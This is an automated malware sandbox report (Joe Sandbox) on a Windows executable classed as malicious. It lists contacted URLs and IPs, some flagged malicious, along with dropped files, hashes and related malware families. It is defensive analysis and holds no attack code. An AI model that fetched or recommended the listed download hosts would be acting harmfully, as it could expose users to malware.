                                                                      http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webmMMiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.winimage.com/zLibDllminizip.dll.7.drfalse
                                                                        		high
                                                                        http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBox/%E8%B5%84%E6%BA%90%E4%BF%AE%E5%A4%8D%E5%8C%85_2410MiniThunderPlatform.exe, 0000000F.00000003.1722646058.000000000C674000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1723825853.0000000000862000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://logo.verisign.cMiniThunderPlatform.exe, 0000000E.00000002.1614649879.00000000007F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webm12MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://ocsp.verMiniThunderPlatform.exe, 0000000E.00000002.1614649879.00000000007F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webmaMiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBox/MiniThunderPlatform.exe, 0000000F.00000003.1722484573.000000000C66C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722583922.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722683050.000000000C67C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722646058.000000000C674000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1724293363.0000000000BF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        47.102.130.81
                                                                        		bgphub5u.sandai.netChina
                                                                        		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                                        120.27.243.153
                                                                        		os.ljq520.topChina
                                                                        		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                                                        116.132.218.191
                                                                        		unknownChina
                                                                        		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                                        113.200.1.7
                                                                        		bjbgp01.n.shifen.comChina
                                                                        		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                                        111.206.4.176
                                                                        		cnc.hub5pn.sandai.netChina
                                                                        		4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNfalse
                                                                        107.148.237.1
                                                                        		skinx.x1.lolgezi.ccUnited States
                                                                        		54600PEGTECHINCUSfalse
                                                                        116.132.219.22
                                                                        		pr.x.hub.sandai.netChina
                                                                        		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                                        112.64.218.154
                                                                        		cncidx.m.hub.sandai.netChina
                                                                        		17621CNCGROUP-SHChinaUnicomShanghainetworkCNfalse
                                                                        180.163.146.103
                                                                        		sl.gzskins.com.w.kunlunca.comChina
                                                                        		4812CHINANET-SH-APChinaTelecomGroupCNfalse
                                                                        140.206.225.136
                                                                        		cnchubstat.sandai.netChina
                                                                        		17621CNCGROUP-SHChinaUnicomShanghainetworkCNtrue
                                                                        47.92.202.235
                                                                        		cnc.hub5pnc.sandai.netChina
                                                                        		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                                        239.255.255.250
                                                                        		unknownReserved
                                                                        		unknownunknownfalse
                                                                        36.138.50.131
                                                                        		download6.mcloud.139.comChina
                                                                        		56044CMNET-AS-LIAONINGChinaMobilecommunicationscorporationCfalse

                                                                        Private

                                                                        IP
                                                                        192.168.2.1
                                                                        127.0.0.1

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1550312
                                                                        Start date and time:2024-11-06 16:39:05 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 13m 53s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:19
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:VZ7xFmeuPX.exe
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:327722aa946d64bcf5d584723dc62e9c88f4b2d8801f5576100e6d77d7b212ac.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.evad.winEXE@10/37@45/15
                                                                        EGA Information:
                                                                        • Successful, ratio: 66.7%
                                                                        HCA Information:
                                                                        • Successful, ratio: 63%
                                                                        • Number of executed functions: 133
                                                                        • Number of non-executed functions: 261
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, PID 7512 because there are no executed function
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: VZ7xFmeuPX.exe

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        10:40:17API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                        10:40:46API Interceptor127622x Sleep call for process: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        116.132.218.191u6yUxgTEN3.exeGet hashmaliciousUnknownBrowse
                                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                              239.255.255.250[EXTERNAL] Complete with Docusign_ Review_&_sign_Docu #526890 Contract_Agreement.pdf.emlGet hashmaliciousUnknownBrowse
                                                                                http://go.wafykoe.com/0nbeGet hashmaliciousHTMLPhisherBrowse
                                                                                  https://www.google.co.in/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fir.nbaikp3.sa.com%2Fdelaw%2Flawn%2Fkoo%2Fsf_rand_string_mixed(24)/braswells@helenaindustries.comGet hashmaliciousUnknownBrowse
                                                                                    AX8xHzXKHE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                      https://links.giveawayoftheday.com/external?url=https%3A%2F%2Fcertify.us.org/B4G4RAI1Aanz01haD5Qm3TI1Anw4GD5Q2APnufoTxun4DCam3TI1AoTxnz01oTx4RAw4GGet hashmaliciousUnknownBrowse
                                                                                        2CUvvDyapb.exeGet hashmaliciousRemcosBrowse
                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                            Play____Now_AUD__autoresponsed50001b20f2d0a072379154d3aab44a3a4736f9c.htmGet hashmaliciousUnknownBrowse
                                                                                              https://qr.link/YzVlSaGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                https://pub.lucidpress.com/50f1c535-8058-4eec-b469-2bd69fae4557/Get hashmaliciousUnknownBrowse
                                                                                                  111.206.4.176svchost.exeGet hashmaliciousUnknownBrowse
                                                                                                    112.64.218.154Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                      Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                        180.163.146.103dcntel.dll.dllGet hashmaliciousCobaltStrikeBrowse
                                                                                                          140.206.225.136lightning2.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 140.206.225.136:80/
                                                                                                          svchost.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 140.206.225.136:80/

                                                                                                          Domains

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          bgphub5u.sandai.netu6yUxgTEN3.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 39.100.9.39
                                                                                                          lightning2.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 39.100.9.39
                                                                                                          svchost.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 39.100.9.39
                                                                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 47.92.75.245
                                                                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 39.100.9.39
                                                                                                          tyxCV1ouryr7.exeGet hashmaliciousRedLineBrowse
                                                                                                          • 47.92.75.245
                                                                                                          cnc.hub5pnc.sandai.netu6yUxgTEN3.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 47.92.100.53
                                                                                                          lightning2.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 47.92.100.53
                                                                                                          svchost.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 47.92.100.53
                                                                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 47.92.100.53
                                                                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 47.92.100.53
                                                                                                          tyxCV1ouryr7.exeGet hashmaliciousRedLineBrowse
                                                                                                          • 47.92.99.221
                                                                                                          cnc.hub5pn.sandai.netu6yUxgTEN3.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 118.212.146.20
                                                                                                          lightning2.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 111.206.4.176
                                                                                                          svchost.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 111.206.4.176
                                                                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 58.144.251.2
                                                                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 58.144.251.1
                                                                                                          tyxCV1ouryr7.exeGet hashmaliciousRedLineBrowse
                                                                                                          • 118.212.146.20
                                                                                                          cnchubstat.sandai.netlightning2.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 140.206.225.136
                                                                                                          svchost.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 140.206.225.136
                                                                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 140.206.225.232
                                                                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 140.206.225.232
                                                                                                          tyxCV1ouryr7.exeGet hashmaliciousRedLineBrowse
                                                                                                          • 140.206.225.232
                                                                                                          cncidx.m.hub.sandai.netu6yUxgTEN3.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 116.132.218.191
                                                                                                          lightning2.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 112.64.218.40
                                                                                                          svchost.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 116.132.223.136
                                                                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 116.132.218.191
                                                                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 112.64.218.64
                                                                                                          tyxCV1ouryr7.exeGet hashmaliciousRedLineBrowse
                                                                                                          • 116.132.223.136

                                                                                                          ASNs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          CHINA169-BACKBONECHINAUNICOMChina169BackboneCNyakuza.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 120.3.142.176
                                                                                                          2rI5YEg7uo.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 221.128.225.57
                                                                                                          yakuza.sh.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 221.192.39.39
                                                                                                          yakuza.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 60.28.46.65
                                                                                                          yakuza.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 222.163.96.248
                                                                                                          yakuza.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 180.95.227.68
                                                                                                          h0r0zx00x.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 112.229.131.26
                                                                                                          h0r0zx00x.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 112.224.210.216
                                                                                                          IGz.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 110.18.182.233
                                                                                                          nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 175.22.26.196
                                                                                                          CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdyakuza.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 47.100.110.189
                                                                                                          yakuza.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 114.55.106.216
                                                                                                          yakuza.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 47.127.226.90
                                                                                                          h0r0zx00x.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 139.252.21.14
                                                                                                          x86_32.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 47.106.94.203
                                                                                                          m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 8.159.102.65
                                                                                                          arm7.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 8.155.218.241
                                                                                                          sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 47.107.186.85
                                                                                                          ppc.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 8.191.75.250
                                                                                                          ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 47.99.12.72
                                                                                                          CHINA169-BACKBONECHINAUNICOMChina169BackboneCNyakuza.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 120.3.142.176
                                                                                                          2rI5YEg7uo.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 221.128.225.57
                                                                                                          yakuza.sh.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 221.192.39.39
                                                                                                          yakuza.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 60.28.46.65
                                                                                                          yakuza.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 222.163.96.248
                                                                                                          yakuza.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 180.95.227.68
                                                                                                          h0r0zx00x.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 112.229.131.26
                                                                                                          h0r0zx00x.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 112.224.210.216
                                                                                                          IGz.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 110.18.182.233
                                                                                                          nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 175.22.26.196
                                                                                                          CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdyakuza.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 47.100.110.189
                                                                                                          yakuza.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 114.55.106.216
                                                                                                          yakuza.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 47.127.226.90
                                                                                                          h0r0zx00x.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 139.252.21.14
                                                                                                          x86_32.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 47.106.94.203
                                                                                                          m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 8.159.102.65
                                                                                                          arm7.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 8.155.218.241
                                                                                                          sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 47.107.186.85
                                                                                                          ppc.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                          • 8.191.75.250
                                                                                                          ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 47.99.12.72

                                                                                                          JA3 Fingerprints

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          fc54e0d16d9764783542f0146a98b300n3ydjVzUYm.exeGet hashmaliciousCryptOne, VidarBrowse
                                                                                                          • 113.200.1.7
                                                                                                          • 36.138.50.131
                                                                                                          J8igWzSKUw.exeGet hashmaliciousDCRatBrowse
                                                                                                          • 113.200.1.7
                                                                                                          • 36.138.50.131
                                                                                                          6K1uYM85lS.exeGet hashmaliciousPhorpiexBrowse
                                                                                                          • 113.200.1.7
                                                                                                          • 36.138.50.131
                                                                                                          2oK.exeGet hashmaliciousDCRatBrowse
                                                                                                          • 113.200.1.7
                                                                                                          • 36.138.50.131
                                                                                                          EYBfU.exeGet hashmaliciousDCRatBrowse
                                                                                                          • 113.200.1.7
                                                                                                          • 36.138.50.131
                                                                                                          KK63Cn92dU.exeGet hashmaliciousPhonk Miner, XmrigBrowse
                                                                                                          • 113.200.1.7
                                                                                                          • 36.138.50.131
                                                                                                          Yhx3rg6GE4.exeGet hashmaliciousPhonk Miner, Xmrig, zgRATBrowse
                                                                                                          • 113.200.1.7
                                                                                                          • 36.138.50.131
                                                                                                          G3KugQ8kiX.exeGet hashmaliciousPhonk Miner, Xmrig, zgRATBrowse
                                                                                                          • 113.200.1.7
                                                                                                          • 36.138.50.131
                                                                                                          K92v0CujUu.exeGet hashmaliciousParallax RAT, Phonk Miner, XmrigBrowse
                                                                                                          • 113.200.1.7
                                                                                                          • 36.138.50.131
                                                                                                          yD4vgUNMMb.exeGet hashmaliciousParallax RAT, Phonk Miner, Xmrig, zgRATBrowse
                                                                                                          • 113.200.1.7
                                                                                                          • 36.138.50.131
                                                                                                          37f463bf4616ecd445d4a1937da06e192ULrUoVwTx.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • 113.200.1.7
                                                                                                          wmKmOQ868z.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • 113.200.1.7
                                                                                                          wmKmOQ868z.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • 113.200.1.7
                                                                                                          2ULrUoVwTx.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • 113.200.1.7
                                                                                                          p7cCXP3hDz.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • 113.200.1.7
                                                                                                          Anfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • 113.200.1.7
                                                                                                          fIwP4c7xYt.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 113.200.1.7
                                                                                                          6b94X7dMrG.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 113.200.1.7
                                                                                                          0hNX6q4DZ0.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • 113.200.1.7
                                                                                                          3Pd480eWHA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 113.200.1.7

                                                                                                          Dropped Files

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          C:\Users\user\AppData\Local\Temp\download\atl71.dllSafe#U8868#U683cejw665.exeGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                                                                                                            k3yYC4F6nT.exeGet hashmaliciousUnknownBrowse
                                                                                                              u6yUxgTEN3.exeGet hashmaliciousUnknownBrowse
                                                                                                                FA3TCAsA9E.exeGet hashmaliciousUnknownBrowse
                                                                                                                  fNbViAxRGL.exeGet hashmaliciousUnknownBrowse
                                                                                                                    dXaqC8H6qX.exeGet hashmaliciousUnknownBrowse
                                                                                                                      DGSetup_3054BZ73_20191125.exeGet hashmaliciousUnknownBrowse
                                                                                                                        SecuriteInfo.com.Trojan.Siggen12.33370.30028.exeGet hashmaliciousUnknownBrowse
                                                                                                                          SecuriteInfo.com.Trojan.Siggen12.33370.30028.exeGet hashmaliciousUnknownBrowse
                                                                                                                            SecuriteInfo.com.LresultFromObject.32334.exeGet hashmaliciousUnknownBrowse
                                                                                                                              C:\Users\user\AppData\Local\Temp\download\XLBugHandler.dllk3yYC4F6nT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                u6yUxgTEN3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  FA3TCAsA9E.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    fNbViAxRGL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      dXaqC8H6qX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        DGSetup_3054BZ73_20191125.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          SecuriteInfo.com.LresultFromObject.32334.exeGet hashmaliciousUnknownBrowse

                                                                                                                                            Created / dropped Files

                                                                                                                                            C:\Program Files (x86)\Skins\SLAppAssets101.to

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):315734
                                                                                                                                            Entropy (8bit):7.154012118939693
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:rLtgTsoZTfDb9QKpyPDWslKFDpxx8HRQePaLQyzdw:98fTfDqPDWslKtpxx8HRvPakyBw
                                                                                                                                            MD5:F3F333EC8A61E54235B80241B00F4578
                                                                                                                                            SHA1:847A936D7FF4CF9B79BA35C471690FE474111D59
                                                                                                                                            SHA-256:B5B3CDEC933F26A91DAA1B5E2F75B6D0BCD4520E59BD9D92A34E040CD9E7C719
                                                                                                                                            SHA-512:30612364616BDCC593DA625D47E72FDDDA0243464F2CD8EAB50D5EA494A9E2DB1FBE5040F13C322F0BD8E5B3F39FE400787B5A205B8799186BD65DD3CE8786F3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:..G.....E].PFQ.\.W.X..f.1$.sxr.405.415.5..v1>.293.?9<.>;>.;)$.8<:. '%..............................u}..y.....B5r5.>::.;-$.)......................................................f.1%.7.1.60..7 5.$0.]5*4.605.404.514.514.437.073f.1q.536.626.070.055.506.65&.0.u.T"..3....%v....S.vC..b.h...KV."....]5+5.405.404.514.514.437.07.]5.%.405.736.736.614.4 6..#..t"e..PE.w4.....C5=7.53%.$1...9......=..Y.R8.)....f.9TpIds5.594.574.=3..e18.........80..tup..E6./r...)dY..4.93$..57.5.5.512....=gsr...`x>..{.S..:r{>...U..8..3....]..;........../..(|I..{.....zU.-....88...048.ead^u.>.;.}.|>\.v`...7.1.A..\..X....)......p4....(&...5.._.Y..Vw..`9?.|rI.o.t...C...../..i8.Mg..4:....O.4......].n&.E.....5...99.]...\.jy.0...m.3.h.E.&hd1..o......Y..3E .?.V?..>..R..|.X.]8IS.5.51..1..sru.51".,`p=\%^..s-.e.4.o.x.Q..-...10.514.=7..514.514.514.514.6..!GA....Q.u.M=]y.....-...114.7)4.}..Yu25..0..Vsx.v...4.u..c...EjM!..=.;>.o..;o3v.w.$..54.u14.4.7.....dwA.=..."wd..G8..'.JT...H.....s>...0V.X1.....g.....2.

                                                                                                                                            C:\Program Files (x86)\Skins\SLCoreAssets254.to

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5941360
                                                                                                                                            Entropy (8bit):7.945140834790053
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:3CPHr8ODf4bJvYZzIVggz3HQDoowRvA6NNUfDhoG7Dph7H1/l02xP1WUYcXHDuxF:3Cvrvf4FwZUrk3qADfeG3pp1t02xP19e
                                                                                                                                            MD5:BFB790CA20B4B1BE024290B90FAE4B4B
                                                                                                                                            SHA1:AE1877D2421678B480034F9020AB4C5B78035D36
                                                                                                                                            SHA-256:B813FA689216AA8B5F19880AB0200AABE4250EA5353F86B797ED7AF98C027A2B
                                                                                                                                            SHA-512:4560CB7F99791936305A3100C7A56A76B46296F6AC965CD751B9C4342E526EE0128204B86DDCBBC20DBA310EE1A6CC9E9837D2291942CB595BD3DB2761EF5022
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:....Pmx+.8.$\bw$[bw$..w$.bw$_bw$.bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$.bw$Q}.*_.~.~.vh.C#L6.WT-..V>.WG>..K+B.A...J.....-$.2..Aqoz.{bw$_bw$.'w$;.}$..nC_bw$_bw$.bU.T`y._,z$_Xz$_bw$_k.$_rw$_bw.^bw$_rw$_`w$Ybw$_bw$Ybw$_bw$_..$_fw$OP,$\b.%_bg$_bw$_rw$_bw$_bg$_bw$_rw$_bw$_bw$Obw$_bw$_bw$_Q.$.bw$_..$.cw$oM.$;.w$_.-$7|w$_..$+bw$_bw$_bw$_bw$_bw$_bw$_bw$.. $wbw$.O.$.cw$_bw$_bw$_B"$.bw$_bw$_bw$_bw$_bw$_bw$_bw$q..\+bw$W/z$_rw$_bw$_bw$_bw$_bw$_bw$.bwDq..E+.w$.tu$_.z$_bw$_bw$_bw$_bw$_bw$.bwdq..P>bw$.&w$_.x$_bw$_bw$_bw$_bw$_bw$.bw.q..E+.w$..w$_.x$_bw$_bw$_bw$_bw$_bw$.bwdq..Q=bw$_2}$_2g$_bw$_bw$_bw$_bw$_bw$.bw.q.Z$_bw$s.M$_.m$_bw$_bw$_bw$_bw$_bw$.bwDq@.$_bw$.ew$_B"$_jw$_fw$_bw$_bw$_bw$.bw.q;Y$_bw$..-$_R"$_.-$_nw$_bw$_bw$_bw$?bwLq..H0.w$+bw$_..$_`w$_.-$_bw$_bw$_bw$.bwdq..V<bw$.cw$_..$_`w$_.-$_bw$_bw$_bw$.bwd_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$_bw$

                                                                                                                                            C:\Program Files (x86)\Skins\config.dat

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4366
                                                                                                                                            Entropy (8bit):7.9502280737981
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:iEO/EPup008uvITp1rjQpJLQlvzn+JTP1sYWZQtRYXqAenlLfXUJ:iE8Np0YQ1mHZU+OXqBl7XUJ
                                                                                                                                            MD5:7F2DCB3B174F26BB2F16BE737EEA4A84
                                                                                                                                            SHA1:4686494AD3EE98F65C49D3E2A1AC5C499B7CC164
                                                                                                                                            SHA-256:FD1B79516054CB33495D30032E35C834C29C5BCD210DDF9159189D83A5DD9EEB
                                                                                                                                            SHA-512:0610D2A9724CA83637DF902D7137956C567DF1CC74C905A0A3205DF7AEF0198396BCFBBD2150B2A91A29495826A4D2EA332FA42C27A565CFA9A31648C99827EF
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
